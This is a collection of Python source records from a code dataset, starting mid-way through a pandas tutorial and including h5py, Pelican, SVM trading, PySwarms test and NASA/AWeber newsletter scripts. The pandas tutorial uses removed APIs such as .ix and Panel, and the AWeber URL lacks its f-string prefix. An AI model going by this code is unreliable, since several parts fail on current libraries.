frame.reindex(['a', 'b', 'c', 'd']) # 新增row index 'b',新增行的值全为NaN\r\n\r\n# The columns can be reindexed using the columns keyword:\r\nstates = ['Texas', 'Utah', 'California']\r\nframe.reindex(columns=states) # reindex之后'Utah'列的值全为NaN\r\n# Both can be reindexed in one shot, though interpolation will only apply row-wise (axis 0):\r\nframe.reindex(index=['a', 'b', 'c', 'd'], method='ffill', columns=states)\r\nframe.ix[['a', 'b', 'c', 'd'], states] # 等价于上一行 没有设置method参数\r\n\r\n\r\n###########\r\n# Dropping entries from an axis\r\n###########\r\n# the drop method will return a new object with the indicated value or values deleted from an axis:\r\nobj = Series(np.arange(5.), index=['a', 'b', 'c', 'd', 'e'])\r\nnew_obj = obj.drop('c')\r\n\r\ndata = DataFrame(np.arange(16).reshape((4, 4)),\r\n index=['Ohio', 'Colorado', 'Utah', 'New York'],\r\n columns=['one', 'two', 'three', 'four'])\r\ndata.drop(['Colorado', 'Ohio']) # 默认axis=0(row): index\r\ndata.drop('two', axis=1) # axis=1: column\r\ndata.drop(['two', 'four'], axis=1)\r\n\r\n\r\n###########\r\n# Indexing, selection, and filtering\r\n###########\r\nobj = Series(np.arange(4.), index=['a', 'b', 'c', 'd'])\r\nobj['b'] # 等价于obj[1]\r\nobj[1] # index position number offset从0开始\r\n\r\nobj[['b', 'a', 'd']] # 通过label\r\nobj[2:4] # 通过index position number\r\n\r\nobj[[1, 3]] # 通过index position number选取多个\r\nobj[obj < 2] # 筛选 value < 2\r\n\r\n# Slicing with labels behaves differently than normal Python slicing in that the endpoint is inclusive:\r\nobj['b':'c'] # 通过label slice包含endpoint\r\n# Setting using these methods works just as you would expect:\r\nobj['b':'c'] = 5 # 重新对label为'b'和'c'的value设值\r\n\r\ndata = DataFrame(np.arange(16).reshape((4, 4)),\r\n index=['Ohio', 'Colorado', 'Utah', 'New York'],\r\n columns=['one', 'two', 'three', 'four'])\r\ndata['two'] \r\ndata[['three', 'one']] # index columns\r\n\r\ndata[:2] # 选择第0行和第1行 (row)\r\ndata[data['three'] > 5] # 选择所有column 'three'的值大于5的row\r\n\r\n# indexing with a boolean DataFrame\r\ndata < 5 # 返回一个全部由True/False构成的df\r\ndata[data < 5] = 0 # 将df data中小于5的元素全部设为0\r\n# index both row and column\r\ndata.ix['Colorado', ['two', 'three']] # index row label & column label\r\ndata.ix[['Colorado', 'Utah'], [3, 0, 1]] # index rol label & column position number\r\ndata.ix[2] # index 第3行 position number从0开始\r\ndata.ix[:'Utah', 'two'] # index 所有到'Utah'之前的row 和 column with label 'two'\r\ndata.ix[data.three > 5, :3] # index column 'three'大于5的所有行,取其前3列\r\n\r\n\r\n###########\r\n# Arithmetic and data alignment\r\n###########\r\n# When adding together objects, if any index pairs are not the same, the respective index \r\n# in the result will be the union of the index pairs.\r\ns1 = Series([7.3, -2.5, 3.4, 1.5], index=['a', 'c', 'd', 'e'])\r\ns2 = Series([-2.1, 3.6, -1.5, 4, 3.1], index=['a', 'c', 'e', 'f', 'g'])\r\ns1 + s2\r\n# The internal data alignment introduces NA values in the indices that don’t overlap.\r\n# Missing values propagate in arithmetic computations.\r\n\r\n# Adding these together returns a DataFrame whose index and columns are the unions\r\n# of the ones in each DataFrame:\r\ndf1 = DataFrame(np.arange(9.).reshape((3, 3)), columns=list('bcd'),\r\n index=['Ohio', 'Texas', 'Colorado'])\r\ndf2 = DataFrame(np.arange(12.).reshape((4, 3)), columns=list('bde'),\r\n index=['Utah', 'Ohio', 'Texas', 'Oregon'])\r\ndf1 + df2\r\n\r\n# Arithmetic methods with fill values\r\ndf1 = DataFrame(np.arange(12.).reshape((3, 4)), columns=list('abcd'))\r\ndf2 = DataFrame(np.arange(20.).reshape((4, 5)), columns=list('abcde'))\r\n# Adding these together results in NA values in the locations that don’t overlap:\r\ndf1 + df2\r\n# Using the add method on df1, I pass df2 and an argument to fill_value:\r\ndf1.add(df2, fill_value=0)\r\n\r\n# Relatedly, when reindexing a Series or DataFrame, you can also specify a different fill value:\r\ndf1.reindex(index=df2.index, columns=df2.columns, fill_value=0)\r\ndf1.reindex(index=df2.index, columns=df2.columns, fill_value=0) + df2\r\n\r\n\r\n# Operations between DataFrame and Series\r\nframe = DataFrame(np.arange(12.).reshape((4, 3)), columns=list('bde'),\r\n index=['Utah', 'Ohio', 'Texas', 'Oregon'])\r\nseries = frame.ix[0]\r\n# By default, arithmetic between DataFrame and Series matches the index of the Series\r\n# on the DataFrame's columns, broadcasting down the rows:\r\nframe - series\r\n# If an index value is not found in either the DataFrame’s columns or the Series’s index,\r\n# the objects will be reindexed to form the union:\r\nseries2 = Series(range(3), index=['b', 'e', 'f'])\r\nframe + series2\r\n\r\n# If you want to instead broadcast over the columns, matching on the rows, you have to\r\n# use one of the arithmetic methods. \r\nseries3 = frame['d']\r\n# DataFrame.sub:Subtraction of dataframe and other, element-wise (binary operator sub).\r\n# frame中的每一列 减去 series3中的对应元素\r\nframe.sub(series3, axis=0) \r\n# The axis number that you pass is the axis to match on. In this case we mean to match\r\n# on the DataFrame’s row index and broadcast across.\r\n\r\n\r\n###########\r\n# Function application and mapping\r\n###########\r\n# NumPy ufuncs (element-wise array methods) work fine with pandas objects:\r\nframe = DataFrame(np.random.randn(4, 3), columns=list('bde'),\r\n index=['Utah', 'Ohio', 'Texas', 'Oregon'])\r\nnp.abs(frame)\r\n\r\n# Another frequent operation is applying a function on 1D arrays to each column or row.\r\n# DataFrame’s apply method does exactly this:\r\nf = lambda x: x.max() - x.min()\r\nframe.apply(f) # 默认axis=0,对于每个column apply lambda\r\nframe.apply(f, axis=1) # axis=1, 对每行(row) apply lambda\r\n\r\n# Many of the most common array statistics (like sum and mean) are DataFrame methods,\r\n# so using apply is not necessary.\r\nframe.mean() # 默认对每个column求均值\r\nframe.sum(axis=1) # axis=1对每行(row)求和\r\n\r\n# The function passed to apply need not return a scalar value, it can also return a Series\r\n# with multiple values:\r\ndef f(x):\r\n return Series([x.min(), x.max()], index=['min', 'max'])\r\nframe.apply(f) # 默认axis=0,对每个column求min和max\r\n \r\n# Element-wise Python functions can be used with applymap:\r\nformat = lambda x: '%.2f' % x # applymap对df中所有元素apply func\r\nframe.applymap(format)\r\n\r\n# The reason for the name applymap is that Series has a map method for applying an element-wise function: \r\nframe['e'].map(format)\r\n \r\n###########\r\n# Sorting and ranking\r\n###########\r\nobj = Series(range(4), index=['d', 'a', 'b', 'c'])\r\nobj.sort_index() # sort lexicographically by row or column index\r\n\r\nframe = DataFrame(np.arange(8).reshape((2, 4)), index=['three', 'one'],\r\n columns=['d', 'a', 'b', 'c'])\r\nframe.sort_index() # sort row index\r\nframe.sort_index(axis=1) # sort column index\r\nframe.sort_index(axis=1, ascending=False) # sort desc\r\n\r\n# To sort a Series by its values, use its order method:\r\nobj = Series([4, 7, -3, 2]) \r\nobj.order() # sort by value \r\n# Any missing values are sorted to the end of the Series by default:\r\nobj = Series([4, np.nan, 7, np.nan, -3, 2])\r\nobj.order() # sort by value; missing values are sorted to the end\r\n\r\nframe = DataFrame({'b': [4, 7, -3, 2], 'a': [0, 1, 0, 1]})\r\n# frame.sort_index(by='b')\r\nframe.sort_values(by='b') # sort_index is deprecated\r\n# frame.sort_index(by=['a', 'b'])\r\nframe.sort_values(by=['a','b']) # To sort by multiple columns, pass a list of names:\r\n\r\n# Ranking is closely related to sorting, assigning ranks from one through the number of \r\n# valid data points in an array. \r\nobj = Series([7, -5, 7, 4, 2, 0, 4])\r\nobj.rank() # by default rank breaks ties by assigning each group the mean rank\r\nobj.rank(method='first') # ranks may be assigned according to the order they’re observed in the data\r\nobj.rank(ascending=False, method='max') # 'max': rank breaks ties by assigning the maximum rank\r\n\r\nframe = DataFrame({'b': [4.3, 7, -3, 2], 'a': [0, 1, 0, 1],\r\n 'c': [-2, 5, 8, -2.5]})\r\nframe.rank(axis=1) # axis=1; 每行rank(asc)\r\nframe.rank() # 默认axis=0, method='average';每列rank(asc)\r\n\r\n###########\r\n# Axis indexes with duplicate values\r\n###########\r\nobj = Series(range(5), index=['a', 'a', 'b', 'b', 'c'])\r\nobj.index.is_unique # 返回False; index有重复,不是unique\r\n\r\nobj['a'] # index 'a'对应多个values,返回一个series\r\nobj['c'] # index 唯一对应value,返回一个数值\r\n\r\ndf = DataFrame(np.random.randn(4, 3), index=['a', 'a', 'b', 'b'])\r\ndf.ix['b'] # index 'b'对应多个value,返回一个sub df\r\n\r\n\r\n#####################################################\r\n# Summarizing and Computing Descriptive Statistics\r\n#####################################################\r\ndf = DataFrame([[1.4, np.nan], [7.1, -4.5],\r\n [np.nan, np.nan], [0.75, -1.3]],\r\n index=['a', 'b', 'c', 'd'],\r\n columns=['one', 'two'])\r\ndf.sum() # compute column sum\r\ndf.sum(axis=1) # compute row sum\r\ndf.mean(axis=1, skipna=False) # 默认skipna=True; skipna设为False后有NaN的 则 Descriptive Statistics 也会为NaN\r\n\r\n# Some methods, like idxmin and idxmax, return indirect statistics like the index value\r\n# where the minimum or maximum values are attained:\r\ndf.idxmax() # 返回每个column最大值所对应的index; 同理df.idxmin()\r\ndf.cumsum() # 返回每列由上到下的累计和\r\ndf.describe() # 返回每列的描述统计量\r\n\r\nobj = Series(['a', 'a', 'b', 'c'] * 4)\r\nobj.describe() # 返回series的描述统计量\r\n\r\n#############\r\n# Correlation and Covariance\r\n############\r\nimport pandas_datareader.data as web # import pandas.io.data as web\r\n\r\nall_data = {}\r\nfor ticker in ['AAPL', 'IBM', 'MSFT', 'GOOG']:\r\n all_data[ticker] = web.get_data_yahoo(ticker, '1/1/2000', '1/1/2010')\r\n\r\nprice = DataFrame({tic: data['Adj Close']\r\n for tic, data in all_data.items()})\r\nvolume = DataFrame({tic: data['Volume']\r\n for tic, data in all_data.items()})\r\n# compute percent changes of the prices:\r\nreturns = price.pct_change() # percent change over given number of periods\r\nreturns.tail()\r\n# The corr method of Series computes the correlation of the overlapping, non-NA,\r\n# aligned-by-index values in two Series. Relatedly, cov computes the covariance:\r\nreturns.MSFT.corr(returns.IBM)\r\nreturns.MSFT.cov(returns.IBM)\r\n\r\n# DataFrame’s corr and cov methods, on the other hand, return a full correlation or\r\n# covariance matrix as a DataFrame, respectively:\r\nreturns.corr()\r\nreturns.cov()\r\n\r\n# Compute pairwise correlations between a DataFrame’s columns or rows with another \r\n# Series or DataFrame using DataFrame’s corrwith method:\r\nreturns.corrwith(returns.IBM)\r\n# Passing a DataFrame computes the correlations of matching column names. Here I\r\n# compute correlations of percent changes with volume:\r\nreturns.corrwith(volume)\r\n\r\n###########\r\n# Unique Values, Value Counts, and Membership\r\n###########\r\nobj = Series(['c', 'a', 'd', 'a', 'a', 'b', 'b', 'c', 'c'])\r\nuniques = obj.unique() # 不一定按顺序;可用 uniques.sort()来排序\r\n\r\nobj.value_counts() # 返回每个unique value的频数\r\npd.value_counts(obj.values, sort=False) # 默认sort=True\r\n\r\nmask = obj.isin(['b', 'c'])\r\nmask # mask是obj series根据条件的True/False\r\nobj[mask] # 返回obj中在mask对应为True的值;等价于obj[obj.isin(['b','c'])]\r\n\r\n# Compute a histogram on multiple related columns in a DataFrame:\r\ndata = DataFrame({'Qu1': [1, 3, 4, 3, 4],\r\n 'Qu2': [2, 3, 1, 2, 3],\r\n 'Qu3': [1, 5, 2, 4, 4]})\r\nresult = data.apply(pd.value_counts).fillna(0)\r\n\r\n\r\n############################\r\n# Handling Missing Data\r\n############################\r\nstring_data = Series(['aardvark', 'artichoke', np.nan, 'avocado'])\r\nstring_data.isnull() # string_data.notnull()\r\n\r\n# The built-in Python None value is also treated as NA in object arrays:\r\nstring_data[0] = None\r\nstring_data.isnull()\r\n\r\n############\r\n# Filtering Out Missing Data\r\n############\r\nfrom numpy import nan as NA\r\ndata = Series([1, NA, 3.5, NA, 7])\r\n\r\n# 移除缺失值\r\ndata.dropna() # 移除缺失值\r\ndata[data.notnull()] # 通过构建一个boolean index来手动过滤缺失值\r\n\r\n# In Data Frame, dropna by default drops 'any' row containing a missing value:\r\ndata = DataFrame([[1., 6.5, 3.], [1., NA, NA],\r\n [NA, NA, NA], [NA, 6.5, 3.]]) # 通过list构建df,每个list是一个row\r\ncleaned = data.dropna() # 只保留为一一个没有NA的row, 默认how='any'\r\n \r\n# Passing how='all' will only drop rows that are all NA:\r\ndata.dropna(how='all')\r\n\r\n# Dropping columns in the same way is only a matter of passing axis=1: \r\ndata[4] = NA \r\ndata.dropna(axis=1, how='all') # axis=1, drop所有值为NaN的column\r\n\r\n# Suppose you want to keep only rows containing a certain number of observations. \r\n# You can indicate this with the thresh argument:\r\ndf = DataFrame(np.random.randn(7, 3))\r\ndf.ix[:4, 1] = NA; df.ix[:2, 2] = NA # 制造缺失值\r\ndf.dropna(thresh=3) # 只保留row中有至少3个observation的row\r\n\r\n###########\r\n# Filling in Missing Data\r\n###########\r\n# Calling fillna with a constant replaces missing values with that value:\r\ndf.fillna(0)\r\n# Calling fillna with a dict you can use a different fill value for each column:\r\ndf.fillna({1: 0.5, 2: -1}) # column1的NaN fill 0.5, column2的NaN fill -1 \r\n\r\n# fillna returns a new object, but you can modify the existing object in place:\r\n_ = df.fillna(0, inplace=True)\r\n\r\ndf = DataFrame(np.random.randn(6, 3))\r\ndf.ix[2:, 1] = NA; df.ix[4:, 2] = NA\r\n\r\ndf.fillna(method='ffill')\r\ndf.fillna(method='ffill', limit=2)\r\ndf.fillna(df.mean()) # 使用每列的均值 替代缺失值\r\n\r\ndata = Series([1., NA, 3.5, NA, 7])\r\ndata.fillna(data.mean()) # 使用series的均值 替代缺失值\r\n\r\n\r\n##################################\r\n# Hierarchical Indexing\r\n##################################\r\ndata = Series(np.random.randn(10), # multiple indexes\r\n index=[['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'd', 'd'],\r\n [1, 2, 3, 1, 2, 3, 1, 2, 2, 3]]) \r\ndata.index\r\n\r\n# partial index\r\ndata['b']\r\ndata['b':'c'] # index label: includes endpoints\r\ndata.ix[['b', 'd']] # index label\r\n\r\n# Selection is even possible in some cases from an “inner” level:\r\ndata[:, 2] # 每个字母index中的 数字index 2所对应的value\r\n\r\n# Hierarchical indexing plays a critical role in reshaping data and group-based operations\r\n# like forming a pivot table.\r\n# rearrange a DataFrame with unstack method:\r\ndata.unstack() # 本来的两层index变为了row index和column\r\ndata.unstack().stack() # The inverse operation of unstack is stack\r\n\r\nframe = DataFrame(np.arange(12).reshape((4, 3)),\r\n index=[['a', 'a', 'b', 'b'], [1, 2, 1, 2]],\r\n columns=[['Ohio', 'Ohio', 'Colorado'],\r\n ['Green', 'Red', 'Green']])\r\nframe.index.names = ['key1', 'key2']\r\nframe.columns.names = ['state', 'color']\r\n# With partial column indexing you can similarly select groups of columns:\r\nframe['Ohio']\r\n# A MultiIndex can be created by itself and then reused; the columns in the above DataFrame with level \r\n# names could be created like this:\r\nfrom pandas import MultiIndex\r\nMultiIndex.from_arrays([['Ohio', 'Ohio', 'Colorado'], ['Green', 'Red', 'Green']],\r\n names=['state', 'color'])\r\n\r\n###########\r\n# Reordering and Sorting Levels\r\n###########\r\n# The swaplevel takes two level numbers or names and returns a new object with \r\n# the levels interchanged (but the data is otherwise unaltered):\r\nframe.swaplevel('key1', 'key2')\r\n\r\n# sortlevel, on the other hand, sorts the data (stably) using only the values in a single level. \r\nframe.sortlevel(1) # sort第二层index, 第一层index是0(默认)\r\nframe.swaplevel(0, 1).sortlevel(0) # it’s not uncommon to also use sortlevel so that the result is lexicographically sorted\r\n\r\n############\r\n# Summary Statistics by Level\r\n############\r\n# Many descriptive and summary statistics on DataFrame and Series have a level option\r\n# in which you can specify the level you want to sum by on a particular axis. \r\nframe.sum(level='key2')\r\nframe.sum(level='color', axis=1)\r\n\r\n###########\r\n# Using a DataFrame’s Columns\r\n###########\r\nframe = DataFrame({'a': range(7), 'b': range(7, 0, -1),\r\n 'c': ['one', 'one', 'one', 'two', 'two', 'two', 'two'],\r\n 'd': [0, 1, 2, 0, 1, 2, 3]})\r\nframe2 = frame.set_index(['c', 'd'])\r\n# reset_index, on the other hand, does the opposite of set_index\r\nframe2.reset_index() # 撤销上一行设置的index\r\n\r\n\r\n####################################\r\n# Other pandas Topics\r\n####################################\r\n\r\n############\r\n# Integer Indexing\r\n############\r\n# pandas could “fall back” on integer indexing, but there’s not a safe and\r\n# general way (that I know of) to do this without introducing subtle bugs. Here we have\r\n# an index containing 0, 1, 2, but inferring what the user wants (label-based indexing or\r\n# position-based) is difficult:\r\nser = Series(np.arange(3.))\r\nser[-1] # 和python的index不同,会报错\r\n# On the other hand, with a non-integer index, there is no potential for ambiguity:\r\nser2 = Series(np.arange(3.), index=['a', 'b', 'c'])\r\nser2[-1]\r\n\r\nser.ix[:1]\r\n\r\nser3 = Series(range(3), index=[-5, 1, 3])\r\nser3.iloc[2] # position-based indexing (从position 0开始,选择第index postion 2)\r\n # deprecated: ser3.iget_value(2)\r\nframe = DataFrame((np.arange(6).reshape(3, 2)), index=[2, 0, 1])\r\nframe.iloc[0] # postion-based indexing; 选择首行\r\n\r\n###########\r\n# Panel Data\r\n###########\r\n\r\n# Pandas has a Panel data structure, which can be thought of as a three-dimensional analogue of DataFrame. \r\nimport pandas_datareader.data as web\r\n# Create panel data with a dict of DataFrame\r\npdata = pd.Panel(dict((stk, web.get_data_yahoo(stk, '1/1/2009', '6/1/2012'))\r\n for stk in ['AAPL', 'GOOG', 'MSFT', 'DELL']))\r\npdata = pdata.swapaxes('items', 'minor')\r\npdata['Adj Close']\r\n\r\n# ix-based label indexing generalizes to three dimensions, so we can select all data at a\r\n# particular date or a range of dates like so:\r\npdata.ix[:, '6/1/2012', :]\r\npdata.ix['Adj Close', '5/22/2012':, :]\r\n\r\nstacked = pdata.ix[:, '5/30/2012':, :].to_frame()\r\n# DataFrame has a related to_panel method, the inverse of to_frame:\r\nstacked.to_panel()\r\n\r\n","sub_path":"pandas_basics/pandas_04_DAP_01_intro.py","file_name":"pandas_04_DAP_01_intro.py","file_ext":"py","file_size_in_byte":27267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"463854037","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport h5py\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument(\"filename\")\nargs=parser.parse_args()\nfilename=args.filename\n\n'''\nLoad the data from the HDF5 file\n'''\nwith h5py.File(filename,'r') as f:\n ratings=f['ratings'][:]\n\n(n,k)=ratings.shape\nprint(n,\"respondants\")\n\nprint(100*sum(ratings[:,1]==0)/n,'percent were female')\n\nfoods=ratings[:,2:20]\n_,fk=foods.shape\nmovies=ratings[:,20:]\n_,mk=movies.shape\n\nprint(100*np.sum(foods>0)/(n*fk),'percent of foods were rated')\nprint(100*np.sum(movies>0)/(n*mk),'percent of movies were rated')\n\nxs,ys=np.where(foods>0)\ns=0\nfor i in range(len(xs)):\n s=s+foods[xs[i],ys[i]]\nprint('average rating of foods was',s/(n*fk))\n","sub_path":"class/02/myh5py.py","file_name":"myh5py.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"7500688","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nAUTHOR = u'Quack1'\nSITENAME = u'Quack1☠Blog'\nSIDEBAR_DIGEST = u'Blog-Notes of a Linux/Security/Hacking guy'\nSITEURL = 'http://quack1.me'\nRELATIVE_URLS = True\nFEED_DOMAIN = SITEURL\nAVATAR = u'upload/avatar.png'\n\nTIMEZONE = 'Europe/Paris'\nDATE_FORMATS = {\n 'fr' : '%d/%m/%Y',\n 'en' : '%d/%m/%Y',\n}\nDEFAULT_LANG = u'fr'\n\n#THEME = \"notebook\"\nTHEME = \"./themes/notebook\"\nPDF_GENERATOR = False\n\n# Blogroll\n\n# Social widget\nSOCIAL = (('Twitter', 'https://twitter.com/_Quack1'),('Mail', 'mailto:blog@quack1.me'))\nTWITTER_USERNAME = \"_Quack1\"\n\nBLOGROLL = (\n ('Zythom', 'http://zythom.blogpost.com'),\n ('Sid', 'http://sid.rstack.org/blog'),\n ('Korben', 'http://korben.info'),\n ('Le Blog des Nouvelles Technologies', 'http://blognt.fr'),\n ('Commit Strip', 'http://www.commitstrip.com/fr/'),\n ('Planet-Libre', 'http://www.planet-libre.org/'),\n ('Planet-Ubuntu', 'http://planet.ubuntu-fr.org/'),\n ('Conix Security', 'http://conixsecurity.fr/'),\n ('GCU-Squad', 'http://www.gcu-squad.org/'),\n ('La Grotte Du Barbu', 'http://lagrottedubarbu.com/'),\n ('JcFrog', 'http://jcfrog.com/blog/')\n )\n\nDEFAULT_PAGINATION = 10\nSTATIC_PATHS = [\"upload\"]\nDISPLAY_PAGES_ON_MENU = \"True\"\n\nFEED_ATOM = 'feeds/all.atom.xml'\nFEED_ALL_ATOM = 'feeds/all.all.atom.xml'\nCATEGORY_FEED_ATOM = 'feeds/category_%s.atom.xml'\nTAG_FEED_ATOM = 'feeds/tag_%s.atom.xml'\n\n# Tag Cloud\nTAG_CLOUD_STEPS = 10\nTAG_CLOUD_MAX_ITEMS = 1000\n\n# Extensions\nPLUGINS = ['pelican.plugins.sitemap','pelican.plugins.global_license']\nMD_EXTENSIONS = ['headerid', 'codehilite(css_class=highlight)', 'footnotes']\n\n# Firefox Affiliates\nFIREFOX_BANNERS = (('35549', '/theme/images/download_firefox.png', u'Télécharger Firefox : facile, amusant, génial'),\n ('36259', '/theme/images/download_firefox_android.png', u'Firefox for Android'))\n\nSITEMAP = {\n 'format': 'xml',\n 'priorities': {\n 'articles': 1,\n 'indexes': 0.75,\n 'pages': 0.75\n },\n 'changefreqs': {\n 'articles': 'daily',\n 'indexes': 'daily',\n 'pages': 'daily'\n }\n}\n\nEXTRA_PATH_METADATA = { 'extras/robots.txt': {'path': 'robots.txt'},\n \t'extras/humans.txt': {'path': 'humans.txt'}}\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"316540540","text":"# Source https://www.quantinsti.com/blog/machine-learning-classification-strategy-python?utm_medium=answer_is&utm_source=quora\n\n# Machine learning classification libraries\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import scorer\nfrom sklearn.metrics import accuracy_score\n \n# For data manipulation\nimport pandas as pd\nimport numpy as np\n \n# To plot\nimport matplotlib.pyplot as plt\nimport seaborn\n\n# To fetch data\nfrom pandas_datareader import data as pdr\n\nDf = pdr.get_data_yahoo('SPY', start=\"2012-01-01\", end=\"2017-10-01\") \nDf= Df.dropna()\nDf.Close.plot(figsize=(10,5))\nplt.ylabel(\"S&P500 Price\")\nplt.show()\n\n\n\n#Step 3: Determine the target variable\ny = np.where(Df['Close'].shift(-1) > Df['Close'],1,-1)\n\n#Step 4: Creation of predictors variables\n\nDf['Open-Close'] = Df.Open - Df.Close\nDf['High-Low'] = Df.High - Df.Low\nX=Df[['Open-Close','High-Low']]\n\n#Step 5: Test and train dataset split\n\nsplit_percentage = 0.8\nsplit = int(split_percentage*len(Df))\n\n# Train data set\nX_train = X[:split]\ny_train = y[:split]\n\n# Test data set\nX_test = X[split:]\ny_test = y[split:]\n\n\n#Step 6: Create the machine learning classification model using the train dataset\n\ncls = SVC().fit(X_train, y_train)\n\n#Step 7: The classification model accuracy\n\naccuracy_train = accuracy_score(y_train, cls.predict(X_train))\naccuracy_test = accuracy_score(y_test, cls.predict(X_test))\nprint('\\nTrain Accuracy:{: .2f}%'.format(accuracy_train*100))\nprint('Test Accuracy:{: .2f}%'.format(accuracy_test*100))\n\n#Step 8: Prediction\n\nDf['Predicted_Signal'] = cls.predict(X)\n\n# Calculate log returns\nDf['Return'] = np.log(Df.Close.shift(-1) / Df.Close)*100\nDf['Strategy_Return'] = Df.Return * Df.Predicted_Signal\nDf.Strategy_Return.iloc[split:].cumsum().plot(figsize=(10,5))\nplt.ylabel(\"Strategy Returns (%)\")\nplt.show()\n\n","sub_path":"examples_heap/PrognozeSmth.py","file_name":"PrognozeSmth.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275708046","text":"import requests\n\nfrom requests_oauthlib import OAuth1Session\nfrom configparser import ConfigParser\nfrom datetime import date, datetime\nfrom pprint import pprint\n\nconfig = ConfigParser()\nconfig.read('apiconfig.ini')\n\nnasa_key = config['nasa_api']['api_key']\n\naweber = OAuth1Session(config['aweber_api']['consumer_key'],\n config['aweber_api']['consumer_secret'],\n config['aweber_api']['access_key'],\n config['aweber_api']['access_secret'])\n\na_id = config['aweber_account']['account_id']\nli_id = config['aweber_account']['list_id']\n\nneows_feed = 'https://api.nasa.gov/neo/rest/v1/feed'\ntodays_date = date.today().isoformat()\nneows_params = {\n 'start_date': todays_date,\n 'end_date': todays_date,\n 'api_key': nasa_key\n}\n\nresponse = requests.get(neows_feed, params=neows_params)\n\nprint('Response Status Code: ' + str(response.status_code))\nobjects = response.json()\nfor obj in objects['near_earth_objects'][todays_date]:\n pprint(obj)\n\nname = ''\nmagnitude = 0\nlink = ''\nif objects['near_earth_objects'][todays_date]:\n name = objects['near_earth_objects'][todays_date][0]['name']\n magnitude = objects['near_earth_objects'][todays_date][0]['absolute_magnitude_h']\n link = objects['near_earth_objects'][todays_date][0]['nasa_jpl_url']\n\nmessage_data = {\n 'is_archived': 'true',\n 'subject': 'Look out Earthlings, an asteroid is near!',\n 'body_html': ''\n f'Look out, an asteroid called {name} is approaching!
'\n f'It has a magnitude of {magnitude}.
'\n f'You can learn more at
this link.
'\n 'See you next time!'\n ''\n}\n\nbroadcasts_url = 'https://api.aweber.com/1.0/accounts/{a_id}/lists/{li_id}/broadcasts'\nresponse = aweber.post(broadcasts_url, data=message_data)\n\nprint('Response Status Code: ' + str(response.status_code))\npprint(response.json())\n\nbroadcast_id = response.json()['broadcast_id']\nschedule_url = f'https://api.aweber.com/1.0/accounts/{a_id}/lists/{li_id}/broadcasts/{broadcast_id}/schedule'\nright_now = datetime.utcnow().isoformat()\nresp = aweber.post(schedule_url, data={'scheduled_for': right_now})\n\nprint(resp.status_code)\nprint(resp.json())\n\nbroad_resp = aweber.get(resp.json()['self_link'])\npprint(broad_resp.json())\n","sub_path":"nasa_demo.py","file_name":"nasa_demo.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447515845","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Unit testing for pyswarms.grid_search\"\"\"\n\n# Import from __future__\nfrom __future__ import with_statement\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\n# Import modules\nimport unittest\nimport numpy as np\n\n# Import from package\nfrom pyswarms.utils.search.grid_search import GridSearch\nfrom pyswarms.single import LocalBestPSO\nfrom pyswarms.single import GlobalBestPSO\nfrom pyswarms.utils.functions.single_obj import sphere_func\n\nclass Base(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Sets up test fixtures\"\"\"\n self.optimizer = LocalBestPSO\n self.n_particles = 40\n self.dimensions = 20\n self.options = {'c1': [1, 2, 3],\n 'c2': [1, 2, 3],\n 'k' : [5, 10, 15],\n 'w' : [0.9, 0.7, 0.4],\n 'p' : [1]}\n self.mini_options = {'c1': [1,2],\n 'c2': 6,\n 'k': 5,\n 'w': 0.9,\n 'p': 0}\n self.bounds = (np.array([-5,-5]), np.array([5,5]))\n self.iters = 10\n self.objective_func = sphere_func\n self.g = GridSearch(self.optimizer, self.n_particles, self.dimensions,\n self.options, self.objective_func, self.iters,\n bounds=None, velocity_clamp=None)\n self.g_mini = GridSearch(self.optimizer, self.n_particles, self.dimensions,\n self.mini_options, self.objective_func, self.iters,\n bounds=None, velocity_clamp=None)\n\nclass MethodReturnType(Base):\n\n def test_search_min_best_options_return_type(self):\n \"\"\"Tests if best options returns a dictionary\"\"\"\n minimum_best_score, minimum_best_options = self.g.search()\n self.assertIsInstance(minimum_best_options, dict)\n\n def test_search_max_best_options_return_type(self):\n \"\"\"Tests if max best options returns a dictionary\"\"\"\n maximum_best_score, maximum_best_options = self.g.search(maximum=True)\n self.assertIsInstance(maximum_best_options, dict)\n\nclass MethodReturnValues(Base):\n\n def test_search_greater_values(self):\n \"\"\"Tests if max is greater than min in sample use-case\"\"\"\n minimum_best_score, minimum_best_options = self.g.search()\n maximum_best_score, maximum_best_options = self.g.search(maximum=True)\n self.assertGreater(maximum_best_score, minimum_best_score)\n\n def test_generate_grid(self):\n \"\"\"Tests if generate_grid function returns expected value.\"\"\"\n self.assertEqual(self.g_mini.generate_grid(),\n [{'c1': 1, 'c2': 6, 'k': 5, 'w': 0.9, 'p': 0},\n {'c1': 2, 'c2': 6, 'k': 5, 'w': 0.9, 'p': 0}])\n\nclass Instantiation(Base):\n\n def test_optimizer_type_fail(self):\n \"\"\"Tests that :code:`optimizer` of type :code:`string` raises\n :code:`TypeError`\"\"\"\n bad_optimizer = 'LocalBestPSO' # a string instead of a class object\n with self.assertRaises(TypeError):\n g = GridSearch(bad_optimizer, self.n_particles, self.dimensions,\n self.options, self.objective_func, self.iters,\n bounds=None, velocity_clamp=None)\n","sub_path":"tests/utils/search/test_gridsearch.py","file_name":"test_gridsearch.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"362145744","text":"use = True\nimport os\nimport time\nfrom sys import platform\n\ndef bannerwin():\n print(\" \")\n print(\".oPYo. o o \")\n print(\"8 8 8 8 \")\n print(\"8 .oPYo. odYo. o o 8 odYo. 